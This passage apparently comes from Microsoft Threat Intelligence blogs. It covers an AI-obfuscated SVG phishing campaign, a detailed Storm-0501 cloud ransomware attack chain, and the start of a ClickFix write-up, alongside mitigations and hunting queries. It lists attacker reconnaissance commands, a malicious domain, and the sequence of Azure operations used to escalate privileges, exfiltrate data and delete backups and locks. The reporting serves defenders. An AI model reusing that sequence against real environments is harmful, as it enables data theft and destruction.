These signals are largely unaffected by whether the payload was written by a human or an LLM. In fact, AI-generated obfuscation often introduces synthetic artifacts, like verbose naming, redundant logic, or unnatural encoding schemes, that can become new detection signals themselves.
Despite the use of AI to obfuscate the SVG payload, this campaign was blocked by Microsoft Defender for Office 365’s detection system through a combination of infrastructure analysis, behavioral indicators, and message context, none of which were impacted by the use of AI. Signals used to detect this campaign included the following:
Use of self-addressed email with BCCed recipients – This tactic is commonly used to attempt to bypass basic email heuristics and hide the true recipient list.
Suspicious file type/name – SVG files, generally, have been an emerging payload used in phishing attacks and the attachments in this campaign were named to resemble a PDF, which is atypical for legitimate document sharing.
Redirect to malicious infrastructure – The SVG payload redirected to a domain that had previously been identified as being linked to phishing content.
General use of code obfuscation – While the SVG file contained novel obfuscation tactics that hadn’t been seen before, the presence of obfuscation alone was an indicator of potentially malicious intent.
Suspicious network behavior – Automated analysis of the phishing site indicated that it employed session tracking and browser fingerprinting, which can be used to selectively serve content based on geography or environment, a behavior used by some phishing actors.
Recommendations
While this campaign was limited in scope and effectively blocked, similar techniques are increasingly being leveraged by a range of threat actors. Sharing our findings equips organizations to identify and mitigate these emerging threats, regardless of the specific threat actor behind them. Microsoft Threat Intelligence recommends the following mitigations, which are effective against a range of phishing threats, including those that may use AI-generated code.
Configure Microsoft Defender for Office 365 to recheck links on click. Safe Links provides URL scanning and rewriting of inbound email messages in mail flow, and time-of-click verification of URLs and links in email messages, other Microsoft 365 applications such as Teams, and other locations such as SharePoint Online. Safe Links scanning occurs in addition to the regular anti-spam and anti-malware protection in inbound email messages in Microsoft Exchange Online Protection (EOP). Safe Links scanning can help protect your organization from malicious links used in phishing and other attacks.
Turn on Zero-hour auto purge (ZAP) in Defender for Office 365 to quarantine sent mail in response to newly-acquired threat intelligence and retroactively neutralize malicious phishing, spam, or malware messages that have already been delivered to mailboxes.
Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attack tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic
Observed activity
Microsoft Defender coverage
Initial access
-Phishing emails sent from a compromised small business email account. -Phishing emails contained an attached SVG file.
–Microsoft Defender for Office 365 tenant admins can use Threat Explorer to query associated SVG file attachments using file type, file extension, or attachment file name fields. The rule description from Threat Explorer is: This SVG has traits consistent with credential phishing campaigns. –Microsoft Defender XDR Malicious email-sending activity from a risky user
Execution
-Embedded JavaScript within the attached SVG file executed upon opening in a browser.
Defense evasion
-Obfuscation using invisible SVG elements and encoded business terminology. -Fake CAPTCHA, browser fingerprinting, and session tracking used to evade detection.
Impact
-Potential credential theft if targeted user completes the phishing flow.
–Microsoft Defender XDR Risky sign in attempt following a possible phishing campaign
Microsoft Security Copilot
Security Copilot customers can use the standalone experience to create their own prompts or run the following prebuilt promptbooks to automate incident response or investigation tasks related to this threat:
Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment
Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.
Hunting queries
Microsoft Sentinel
Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.
Below are the queries using Sentinel Advanced Security Information Model (ASIM) functions to hunt threats across both Microsoft first party and third-party data sources. ASIM also supports deploying parsers to specific workspaces from GitHub using an ARM template or manually.
Detect network domain indicators of compromise using ASIM
The following query checks IP addresses and domain IOCs across data sources supported by ASIM network session parser:
//Domain list- _Im_NetworkSession
let lookback = 30d;
let ioc_ip_addr = dynamic([]);
let ioc_domains = dynamic(["kmnl.cpfcenters.de"]);
_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstDomain has_any (ioc_domains)
| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated),
EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor
Detect domain and URL indicators of compromise using ASIM
The following query checks domain and URL IOCs across data sources supported by ASIM web session parser:
// Domain list - _Im_WebSession
let ioc_domains = dynamic(["kmnl.cpfcenters.de”]);
_Im_WebSession (url_has_any = ioc_domains)
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Microsoft Threat Intelligence has observed financially motivated threat actor Storm-0501 continuously evolving their campaigns to achieve sharpened focus on cloud-based tactics, techniques, and procedures (TTPs). While the threat actor has been known for targeting hybrid cloud environments, their primary objective has shifted from deploying on-premises endpoint ransomware to using cloud-based ransomware tactics.
Unlike traditional on-premises ransomware, where the threat actor typically deploys malware to encrypt critical files across endpoints within the compromised network and then negotiates for a decryption key, cloud-based ransomware introduces a fundamental shift. Leveraging cloud-native capabilities, Storm-0501 rapidly exfiltrates large volumes of data, destroys data and backups within the victim environment, and demands ransom—all without relying on traditional malware deployment.
Storm-0501’s targeting is opportunistic. The threat actor initially deployed Sabbath ransomware in an attack against United States school districts in 2021. In November 2023, the actor targeted the healthcare sector. Over the years, the actor switched ransomware payloads multiple times, using Embargo ransomware in 2024 attacks.
In September 2024, we published a blog detailing how Storm-0501 extended its on-premises ransomware operations into hybrid cloud environments. The threat actor gained a foothold by compromising Active Directory environments and then pivoted to Microsoft Entra ID, escalating privileges on hybrid and cloud identities to gain global administrator privileges. The impact phase of these attacks took one of two forms: implanting backdoors in Entra ID tenant configurations using maliciously added federated domains to allow sign-in as nearly any user or deploying on-premises ransomware to encrypt endpoints and servers, eventually demanding ransom for the decryption keys.
Storm-0501 has continued to demonstrate proficiency in moving between on-premises and cloud environments, exemplifying how threat actors adapt as hybrid cloud adoption grows. They hunt for unmanaged devices and security gaps in hybrid cloud environments to evade detection and escalate cloud privileges and, in some cases, traverse tenants in multi-tenant setups to achieve their goals.
In this blog post, we describe the impact of a recent Storm-0501 attack on a compromised cloud environment. We trace how the threat actor achieved cloud-based ransomware impact through cloud privilege escalation, taking advantage of protection and visibility gaps across the compromised environment, and pivoting from on-premises to cloud pivots. Understanding how such attacks are conducted is critical in protecting cloud environments. Below we share protection and mitigation recommendations, including strengthening protections for cloud identities and cloud resources, and detection guidance across Microsoft security solutions to help organizations harden their networks against these attacks.
Figure 1. Overview of Storm-0501 cloud-based ransomware attack chain
On-premises compromise and pivot to the cloud
In a recent campaign, Storm-0501 compromised a large enterprise composed of multiple subsidiaries, each operating its own Active Directory domain. These domains are interconnected through domain trust relationships, enabling cross-domain authentication and resource access.
The cloud environment mirrors this complexity. Different subsidiaries maintain separate Microsoft Azure tenants, with varying Microsoft Defender product coverage. Notably, only one tenant had Microsoft Defender for Endpoint deployed, and devices from multiple Active Directory domains were onboarded to this single tenant’s license. This fragmented deployment created visibility gaps across the environment.
Active Directory domains were synchronized to several Entra ID tenants using Entra Connect Sync servers. In some cases, a single domain was synced to more than one tenant, further complicating identity management and monitoring. For clarity, this blog focuses on the two tenants impacted by the attack: one where on-premises activity was observed, and another where cloud-based activity occurred.
Figure 2. Storm-0501 on-premises attack chain
On-premises activity
For the purposes of this blog, we focus our analysis on the post-compromise phase of the on-premises attack, meaning that the threat actor had already achieved domain administrator privileges in the targeted domain. Read our previous blog for a more comprehensive overview of Storm-0501 tactics in on-premises environments.
The limited deployment of Microsoft Defender for Endpoint across the environment significantly hindered detection. Of the multiple compromised domains, only one domain had significant Defender for Endpoint deployment, leaving portions of the network unmonitored. On the few onboarded devices where Storm-0501 activity was observed, we noted that the threat actor conducted reconnaissance before executing malicious actions. Specifically, the threat actor used the following commands:
sc query sense sc query windefend
The threat actor checked for the presence of Defender for Endpoint services, suggesting a deliberate effort to avoid detection by targeting non-onboarded systems. This highlights the importance of comprehensive endpoint coverage.
Lateral movement was facilitated using Evil-WinRM, a post-exploitation tool that utilizes PowerShell over Windows Remote Management (WinRM) for remote code execution. The abovementioned commands were executed over sessions initiated with the tool, as well as discovery using other common native Windows tools and commands such as quser.exe and net.exe. Earlier in the attack, the threat actor had compromised an Entra Connect Sync server that was not onboarded to Defender for Endpoint. We assess that this server served as a pivot point, with the threat actor establishing a tunnel to move laterally within the network.
The threat actor also performed a DCSync attack, a technique that abuses the Directory Replication Service (DRS) Remote Protocol to simulate the behavior of a domain controller. By impersonating a domain controller, the threat actor could request password hashes for any user in the domain, including privileged accounts. This technique is often used to extract credentials without triggering traditional authentication-based alerts.
Pivot to the cloud
Following the on-premises compromise of the first tenant, the threat actor leveraged the Entra Connect Sync Directory Synchronization Account (DSA) to enumerate users, roles, and Azure resources within the tenant. This reconnaissance was performed using AzureHound, a tool designed to map relationships and permissions in Azure environments and consequently find potential attack paths and escalations.
Shortly thereafter, the threat actor attempted to sign in as several privileged users. These attempts were unsuccessful, blocked by Conditional Access policies and multifactor authentication (MFA) requirements. This suggests that while Storm-0501 had valid credentials, they lacked the necessary second factor or were unable to satisfy policy conditions.
Undeterred, Storm-0501 shifted tactics. Leveraging their foothold in the Active Directory environment, they traversed between Active Directory domains and eventually moved laterally to compromise a second Entra Connect server associated with different Entra ID tenant and Active Directory domain. The threat actor extracted the Directory Synchronization Account to repeat the reconnaissance process, this time targeting identities and resources in the second tenant.
Identity escalation
As a result of the discovery phase where the threat actor leveraged on-premises control to pivot across Active Directory domains and vastly enumerate cloud resources, they gained critical visibility of the organization’s security posture. They then identified a non-human synced identity that was assigned with the Global Administrator role in Microsoft Entra ID on that tenant. Additionally, this account lacked any registered MFA method. This enabled the threat actor to reset the user’s on-premises password, which shortly after was then legitimately synced to the cloud identity of that user using the Entra Connect Sync service. We identified that that password change was conducted by the Entra Connect’s Directory Synchronization Account (DSA), since the Entra Connect Sync service was configured on the most common mode Password-Hash Synchronization (PHS). Consequently, the threat actor was able to authenticate against Entra ID as that user using the new password.
Since no MFA was registered to that user, after successfully authenticating using the newly assigned password, the threat actor was redirected to simply register a new MFA method under their control. From then on, the compromised user had a registered MFA method that enabled the threat actor to meet MFA conditions and comply with the customer’s Conditional Access policies configuration per resource.
To access the Azure portal using the compromised Global Admin account, the threat actor had to bypass one more condition that was enforced by Conditional Access policies for that resource, which require authentication to occur from a Microsoft Entra hybrid joined device. Hybrid joined devices are devices that are joined to both the Active Directory domain and Entra ID. We observed failed authentication attempts coming from company devices that are either domain-joined or Entra-joined devices that did not meet the Conditional Access condition. The threat actor had to move laterally between different devices in the network, until we observed a successful sign-in to the Azure portal with the Global Admin account coming from a server that was hybrid joined.
From the point that the threat actor was able to successfully meet the Conditional Access policies and sign in to the Azure portal as a Global Admin account, Storm-0501 essentially achieved full control over the cloud domain. The threat actor then utilized the highest possible cloud privileges to obtain their goals in the cloud.
Figure 3. Storm-0501 cloud identity and cloud environment compromise leading to extortion
Cloud identity compromise: Entra ID
Cloud persistence
Following successful authentication as a Global Admin to the tenant, Storm-0501 immediately established a persistence mechanism. As was seen in the threat actor’s previous activity, Storm-0501 created a backdoor using a maliciously added federated domain, enabling them to sign in as almost any user, according to the ImmutableId user property. The threat actor leveraged the Global Administrator Entra role privileges and the AADInternals tool to register a threat actor-owned Entra ID tenant as a trusted federated domain by the targeted tenant. To establish trust between the two tenants, a threat actor-generated root certificate is provided to the victim tenant, which in turn is used to allow authentication requests coming from the threat actor-owned tenant. The backdoor enabled Storm-0501 to craft security assertion markup language (SAML) tokens applicable to the victim tenant, impersonating users in the victim tenant while assuming the impersonated user’s Microsoft Entra roles.
Cloud compromise: Azure
Azure initial access and privilege escalation
A tenant’s Entra ID and Azure environments are intertwined. And since Storm-0501 gained top-level Entra ID privileges, they could proceed to their final goal, which was to use cloud-based ransomware tactics for monetary gain. To achieve this goal, they had to find the organization’s valuable data stores, and these were residing in the cloud: in Azure.
Because they had compromised a user with the Microsoft Entra Global Administrator role, the only operation they had to do to infiltrate the Azure environment was to elevate their access to Azure resources. They elevated their access to Azure resources by invoking the Microsoft.Authorization/elevateAccess/action operation. By doing so, they gained the User Access Administrator Azure role over all the organization’s Azure subscriptions, including all the valuable data residing inside them.
To freely operate within the environment, the threat actor assigned themselves the Owner Azure role over all the Azure subscriptions available by invoking the Microsoft.Authorization/roleAssignments/write operation.
Discovery
After taking control over the organization’s Azure environment, we assess that the threat actor initiated a comprehensive discovery phase using various techniques, including the usage of the AzureHound tool, where they attempted to locate the organization’s critical assets, including data stores that contained sensitive information, and data store resources that are meant to back up on-premises and cloud endpoint devices. The threat actor managed to map out the Azure environment, including the understanding of existing environment protections, such as Azure policies, resource locks, Azure Storage immutability policies, and more.
Defense evasion
The threat actor then targeted the organization’s Azure Storage accounts. Using the public access features in Azure Storage, Storm-0501 exposed non-remotely accessible accounts to the internet and to their own infrastructure, paving the way for data exfiltration phase. They did this by utilizing the public access features in Azure Storage. To modify the Azure Storage account resources, the threat actor abused the Azure Microsoft.Storage/storageAccounts/write operation.
Credential access
For Azure Storage accounts that have key access enabled, the threat actor abused their Azure Owner role to access and steal the access keys for them by abusing the Azure Microsoft.Storage/storageAccounts/listkeys/action operation.
Exfiltration
After exposing the Azure Storage accounts, the threat actor exfiltrated the data in these accounts to their own infrastructure by abusing the AzCopy Command-line tool (CLI).
Impact
In on-premises ransomware, the threat actor typically deploys malware that encrypts crucial files on as many endpoints as possible, then negotiates with the victim for the decryption key. In cloud-based ransomware attacks, cloud features and capabilities give the threat actor the capability to quickly exfiltrate and transmit large amounts of data from the victim environment to their own infrastructure, destroy the data and backup cloud resources in the victim cloud environment, and then demand the ransom.
After completing the exfiltration phase, Storm-0501 initiated the mass-deletion of the Azure resources containing the victim organization data, preventing the victim from taking remediation and mitigation action by restoring the data. They do so by abusing the following Azure operations against multiple Azure resource providers:
Microsoft.Compute/snapshots/delete – Deletes Azure Snapshot, a read-only, point-in-time copy of an Azure VM’s disk (VHD), capturing its state and data at a specific moment, that exists independently from the source disk and can be used as a backup or clone of that disk.
Microsoft.Compute/restorePointCollections/delete – Deletes the Azure VM Restore Point, which stores virtual machines (VM) configuration and point-in-time application-consistent snapshots of all the managed disks attached to the VM.
Microsoft.Storage/storageAccounts/delete – Deletes the Azure storage account, which contains and organization’s Azure Storage data objects: blobs, files, queues, and tables. In all of Storm-0501 Azure campaigns we investigated, this is where they mainly focused, deleting as many Azure Storage account resources as possible in the environment.
Microsoft.RecoveryServices/Vaults/backupFabrics/protectionContainers/delete – Deletes an Azure recovery services vault protection container. A protection container is a logical grouping of resources (like VMs or workloads) that can be backed up together, within the Recovery Services vault.
During the threat actor’s attempts to mass-delete the data-stores/housing resources, they faced errors and failed to delete some of the resources due to the existing protections in the environment. These protections include Azure resource locks and Azure Storage immutability policies. They then attempted to delete these protections using the following operations:
Microsoft.Authorization/locks/delete – Deletes Azure resource locks, which are used to prevent accidental user deletion and modification of Azure subscriptions, resource groups, or resources. The lock overrides any user permission.
Microsoft.Storage/storageAccounts/blobServices/containers/immutabilityPolicies/delete – Deletes Azure storage immutability policies, which protect blob data from being overwritten or deleted.
After successfully deleting multiple Azure resource locks and Azure Storage immutability policies, the threat actor continued the mass deletion of the Azure data stores, successfully erasing resources in various Azure subscriptions. For resources that remained protected by immutability policies, the actor resorted to cloud-based encryption.
To perform cloud-based encryption, Storm-0501 created a new Azure Key Vault and a new Customer-managed key inside the Key Vault, which is meant to be used to encrypt the left Azure Storage accounts using the Azure Encryption scopes feature:
Microsoft.KeyVault/vaults/write – Creates or modifies an existing Azure Key Vault. The threat actor creates a new Azure key vault to host the encryption key.
Microsoft.Storage/storageAccounts/encryptionScopes/write – Creates or modifies Azure storage encryption scopes, which manage encryption with a key that is scoped to a container or an individual blob. When you define an encryption scope, you can specify whether the scope is protected with a Microsoft-managed key or with a customer-managed key that is stored in Azure Key Vault.
The threat actor abused the Azure Storage encryption scopes feature and encrypted the Storage blobs in the Azure Storage accounts. This wasn’t sufficient, as the organization could still access the data with the appropriate Azure permissions. In attempt to make the data inaccessible, the actor deletes the key that is used for the encryption. However, it’s important to note that Azure Key vaults and keys that are used for encryption purposes are protected by the Azure Key Vault soft-delete feature, with a default period of 90 days, which allows the user to retrieve the deleted key/vault from deletion, preventing cloud-based encryption for ransomware purposes.
After successfully exfiltrating and destroying the data within the Azure environment, the threat actor initiated the extortion phase, where they contacted the victims using Microsoft Teams using one of the previously compromised users, demanding ransom.
Mitigation and protection guidance
Microsoft recently implemented a change in Microsoft Entra ID that restricts permissions on the Directory Synchronization Accounts (DSA) role in Microsoft Entra Connect Sync and Microsoft Entra Cloud Sync. This change helps prevent threat actors from abusing Directory Synchronization Accounts in attacks to escalate privileges. Additionally, a new version released in May 2025 introduces modern authentication, allowing customers to configure application-based authentication for enhanced security (currently in public preview). It is also important to enable Trusted Platform Module (TPM) on the Entra Connect Sync server to securely store sensitive credentials and cryptographic keys, mitigating Storm-0501’s credential extraction techniques.
The techniques used by threat actors and described in this blog can be mitigated by adopting the following security measures:
Protecting on-premises
Turn on tamper protection features to prevent threat actors from stopping security services such as Microsoft Defender for Endpoint, which can help prevent hybrid cloud environment attacks such as Microsoft Entra Connect abuse.
Run endpoint detection and response (EDR) in block mode so that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
Turn on investigation and remediation in full automated mode to allow Defender for Endpoint to take immediate action on alerts to help remediate alerts, significantly reducing alert volume.
Protecting cloud identities
Secure accounts with credential hygiene: practice the principle of least privilege and audit privileged account activity in your Microsoft Entra ID and Azure environments to slow or stop threat actors.
Enable Conditional Access policies – Conditional Access policies are evaluated and enforced every time the user attempts to sign in. Organizations can protect themselves from attacks that leverage stolen credentials by enabling policies such as device compliance or trusted IP address requirements.
Set a Conditional Access policy to limit the access of Microsoft Entra ID Directory Synchronization Accounts (DSA) from untrusted IP addresses to all cloud apps. Please refer to the advanced hunting section and check the relevant query to get those IP addresses.
For Entra Connect Sync servers using application-based authentication, use Conditional Access for workload identities to restrict the application’s service principal from similar unauthorized access.
Ensure separate user accounts and mail forwarding for Global Administrator accounts. Global Administrator (and other privileged groups) accounts should be cloud-native accounts with no ties to on-premises Active Directory. See other best practices for using Privileged roles here.
Ensure all existing privileged users have an already registered MFA method to protect against malicious MFA registrations
Ensure Microsoft Defender for Cloud Apps connectors are turned on for your organization to receive alerts on the Microsoft Entra ID Directory Synchronization Account and all other users.
Enable protection to prevent by-passing of cloud Microsoft Entra MFA when federated with Microsoft Entra ID. This enhances protection against federated domains attacks.
Set the validatingDomains property of federatedTokenValidationPolicy to “all” to block attempts to sign-in to any non-federated domain (like .onmicrosoft.com) with SAML tokens.
If only Microsoft Entra ID performs MFA for a federated domain, set federatedIdpMfaBehavior to rejectMfaByFederatedIdp to prevent bypassing MFA CAPs.
Turn on Microsoft Entra ID protection to monitor identity-based risks and create risk-based Conditional Access policies to remediate risky sign-ins.
Protecting cloud resources
Use solutions like Microsoft Defender for Cloud to protect your cloud resources and assets from malicious activity, both in posture management, and threat detection capabilities.
Enable Microsoft Defender for Resource Manager as part of Defender for Cloud to automatically monitor the resource management operations in your organization. Defender for Resource Manager runs advanced security analytics to detect threats and alerts you about suspicious activity.
Enabling Defender for Resource Manager allows users to investigate Azure management operations within the Defender XDR, using the advanced hunting experience.
Utilize the Azure Monitor activity log to investigate and monitor Azure management events.
Utilize Azure policies for Azure Storage to prevent network and security misconfigurations and maximize the protection of business data stored in your storage accounts.
Enable Azure Monitor for Azure Blob Storage to collect, aggregate, and log data to enable recreation of activity trails for investigation purposes when a security incident occurs or network is compromised.
EnableAzure blob backup to protect from accidental or malicious deletions of blobs or storage accounts.
Apply the principle of least privilege when authorizing access to blob data in Azure Storage using Microsoft Entra and RBAC and configure fine-grained Azure Blob Storage access for sensitive data access through Azure ABAC.
Enable purge protection in Azure Key Vaults to prevent immediate, irreversible deletion of vaults and secrets. Use the default retention interval of 90 days.
Enable logs in Azure Key Vault and retain them for up to a year to enable recreation of activity trails for investigation purposes when a security incident occurs or network is compromised.
Enable Microsoft Azure Backup for virtual machines to protect the data on your Microsoft Azure virtual machines, and to create recovery points that are stored in geo-redundant recovery vaults.
General hygiene recommendations
Utilize Microsoft Security Exposure Management, available in the Microsoft Defender portal, with capabilities such as critical asset protection and attack path analysis that enable security teams to proactively reduce exposure and mitigate the impact of Storm-0501 hybrid attack tactics. In this case, each of the critical assets involved – Entra Connect server, users with DCSync permissions, Global Administrators – can be identified by relevant alerts and recommendations.
Investigate on-premises and hybrid Microsoft Security Exposure Management attack paths. Security teams can use attack path analysis to trace cross-domain threats that exploit the critical Entra Connect server to pivot into cloud workloads, escalate privileges, and expand their reach. Teams can use the ‘Chokepoint’ view in the attack path dashboard in Microsoft Security Exposure Management to highlight entities appearing in multiple paths.
Utilize the Critical asset management capability in Microsoft Security Exposure Management by configuring your own custom queries to pinpoint your organization’s business-critical assets according to your needs, such as business-critical Azure Storage accounts.
Microsoft Defender XDR detections
Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.
Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.
Tactic
Observed activity
Microsoft Defender coverage
Initial access
– Suspicious sign-ins
Microsoft Defender XDR – Authentication with compromised credentials – Compromised user account in a recognized attack pattern – Malicious sign in from a risky IP address – Malicious sign in from an IP address associated with recognized attacker infrastructure – Malicious sign in from recognized attacker infrastructure -Malicious sign-in from an unusual user agent – Malicious sign-in from known threat actor IP address – Successful authentication from a malicious IP – Successful authentication from a suspicious IP – Successful authentication using compromised credentials – User compromised through session cookie hijack – User signed in from a known malicious IP Address – Suspicious Azure sign-in by user with active session on a device involved in a credential theft attempt
Microsoft Defender for Identity – Possibly compromised user account signed in – Possibly compromised service principal account signed in
Microsoft Defender for Cloud Apps – Suspicious login from AADInternals tool
Microsoft Defender for Cloud Defender for Resource Manager – Suspicious invocation of a high-risk ‘Initial Access’ operation detected (Preview) Defender for Storage – Access from an unusual location to a storage account – Access from an unusual location to a sensitive blob container – Access from a known suspicious IP address to a sensitive blob container – Access from a suspicious IP address – Unusual unauthenticated public access to a sensitive blob container
Execution
– Various types of execution-related suspicious activity by an attacker were observed – Crafting access tokens and executing actions against the cloud
Microsoft Defender for Endpoint – Compromised account conducting hands-on-keyboard attack – Potential human-operated malicious activity – Suspicious cmdlets launch using AADInternals
Persistence
– Federated domain backdoor was added
Microsoft Defender for Cloud Apps – Backdoor creation using AADInternals tool
Privilege escalation
– Elevated access to Azure resources – Assignment of Owner Azure role
Microsoft Defender XDR – Suspicious Azure elevate access operation by a user with an active session on a device involved in a credential theft attempt – Possibly compromised Microsoft Entra Connect Sync account elevated its access to Azure resources – Possibly compromised user elevated access to Azure resources
Microsoft Defender for Cloud Defender for Resource Manager – Suspicious elevate access operation – Suspicious invocation of a high-risk ‘Privilege Escalation’ operation detected (Preview) – Suspicious Azure role assignment detected (Preview)
Defense evasion
– Attempts to tamper with Microsoft Defender Antivirus – Manipulation of Azure Storage account configurations
Microsoft Defender for Endpoint – Attempt to turn off Microsoft Defender Antivirus protection
Microsoft Defender for Cloud Defender for Resource Manager – Suspicious invocation of a high-risk ‘Defense Evasion’ operation detected (Preview)
Credential access
– Entra Connect Sync server compromise and sync accounts extraction – Extracting credentials from remote machines – Executing DCSync operation against a domain controller – Access Azure Storage accounts access keys – Creation of a key inside an Azure Key Vault for encryption of Azure Storage data
Microsoft Defender for Endpoint – Entra Connect Sync credentials extraction attempt – Indication of local security authority secrets theft – Potential Entra Connect Tampering – Ongoing hands-on-keyboard attack using Impacket toolkit – Possible source of DCSync attack
Microsoft Defender for Identity – Suspected DCSync attack (replication of directory services)
Microsoft Defender for Cloud Apps – Compromised Microsoft Entra ID Cloud Sync account – AADInternals tool used by a Microsoft Entra Sync account – Entra Connect Sync account suspicious activity following a suspicious login – Suspicious sign-in to Microsoft Entra Connect Sync account
Microsoft Defender for Cloud Defender for Resource Manager – Suspicious invocation of a high-risk ‘Credential Access’ operation detected (Preview) Defender for Key Vault – Suspicious key vault recovery detected – Unusual application accessed a key vault – Unusual operation pattern in a key vault – Unusual user accessed a key vault
Discovery
– Verifying whether Microsoft Defender for Endpoint is onboarded on a machine – Reconnaissance activity against Active Directory/Entra ID/Azure – AzureHound tool invocation in the cloud environment
Microsoft Defender for Endpoint – Suspicious sequence of exploration activities
Microsoft Defender for Cloud Apps – Suspicious use of AzureHound
Microsoft Defender for Identity – Reconnaissance tool was observed
Microsoft Defender for Cloud Defender for Resource Manager – AzureHound tool invocation detected
Lateral movement
– Lateral movement between endpoints in the network – Lateral movement using Evil-WinRM – Cloud sign-in attempts using stolen credentials or access tokens extracted from compromised endpoints
Microsoft Defender for Endpoint – Possibly malicious use of proxy or tunneling tool – Suspicious remote PowerShell execution
Microsoft Defender for Cloud Apps – Suspicious login from AADInternals tool
Exfiltration
– Data collection and theft from Azure Storage accounts
Microsoft Defender for Cloud Defender for Resource Manager – Suspicious invocation of a high-risk ‘Data Collection’ operation detected (Preview) Defender for Storage – The access level of a potentially sensitive storage blob container was changed to allow unauthenticated public access – Publicly accessible storage containers successfully discovered – Publicly accessible storage containers unsuccessfully scanned – Unusual amount of data extracted from a storage account – Unusual deletion in a storage account – Unusual amount of data extracted from a sensitive blob container – Unusual number of blobs extracted from a sensitive blob container – Unusual SAS token was used to access an Azure storage account from a public IP address – Suspicious external access to an Azure storage account with overly permissive SAS token – Suspicious external operation to an Azure storage account with overly permissive SAS token – Access from a suspicious IP address
Impact
– Mass Azure data store resources deletion and encryption
Microsoft Defender XDR – Suspicious Azure data store resources deletion attempt by a user with an active session on a device involved in a credential theft attempt
Microsoft Defender for Cloud Defender for Resource Manager – Suspicious backup resource deletion (Preview) – Suspicious invocation of a high-risk ‘Impact’ operation detected (Preview) Defender for Storage – Unusual deletion in a storage account
Threat intelligence reports
Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.
Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.
Hunting queries
Microsoft Defender XDR
Microsoft Defender XDR customers can run the following query to find related activity in their networks:
Sign-in activity
Explore sign-in activity from IdentityLogonEvents, look for uncommon behavior, such as sign-ins from newly seen IP addresses or sign-ins to new applications that are non-sync related:
IdentityLogonEvents
| where Timestamp > ago(30d)
| where AccountDisplayName contains "On-Premises Directory Synchronization Service Account"
| extend ApplicationName = tostring(RawEventData.ApplicationName)
| project-reorder Timestamp, AccountDisplayName, AccountObjectId, IPAddress, ActionType, ApplicationName, OSPlatform, DeviceType
The activity of the sync account is typically repetitive, coming from the same IP address to the same application. Any deviation from the natural flow is worth investigating. Cloud applications that are usually accessed by the Microsoft Entra ID sync account are Microsoft Azure Active Directory Connect, Windows Azure Active Directory, and Microsoft Online Syndication Partner Portal.
Cloud activity
Explore the cloud activity (ActionType) of the sync account. Similar to sign-in activity, this account by nature performs a certain set of actions including update User., update Device., and so on. New and uncommon activity from this user might indicate an interactive use of the account, which could legitimate action from someone in the organization or malicious action by the threat actor.
CloudAppEvents
| where Timestamp > ago(30d)
| where AccountDisplayName has "On-Premises Directory Synchronization Service Account"
| extend Workload = RawEventData.Workload
| project-reorder Timestamp, IPAddress, AccountObjectId, ActionType, Application, Workload, DeviceType, OSPlatform, UserAgent, ISP
Pay close attention to action from different DeviceTypes or OSPlatforms, this account automated service is performed from one specific machine, so there shouldn’t be any variety in these fields.
Azure management events
Explore Azure management events by querying the new CloudAuditEvents table in advanced hunting in the Defender portal. The OperationName column indicates the type of control-plane event executed by the user.
Explore Microsoft Security Exposure Management capabilities by querying the ExposureGraphNodes and ExposureGraphEdges tables in the advanced hunting in the Defender portal. By utilizing these tables, you can identify critical assets, including Azure Storage accounts that contain sensitive data or protected by an immutable storage policy. All predefined criticality rules can be found here: Predefined classifications
To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.
Over the past year, Microsoft Threat Intelligence and Microsoft Defender Experts have observed the ClickFix social engineering technique growing in popularity, with campaigns targeting thousands of enterprise and end-user devices globally every day. Since early 2024, we’ve helped multiple customers across various industries address such campaigns attempting to deliver payloads like the prolific Lumma Stealer malware. These payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.
The ClickFix technique attempts to trick users into running malicious commands on their devices by taking advantage of their target’s tendency to solve minor technical issues and other seemingly benign interactions, such as human verification and CAPTCHA checks. It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell. It’s often combined with delivery vectors such as phishing, malvertising, and drive-by compromises, most of which even impersonate legitimate brands and organizations to further reduce suspicion from their targets.
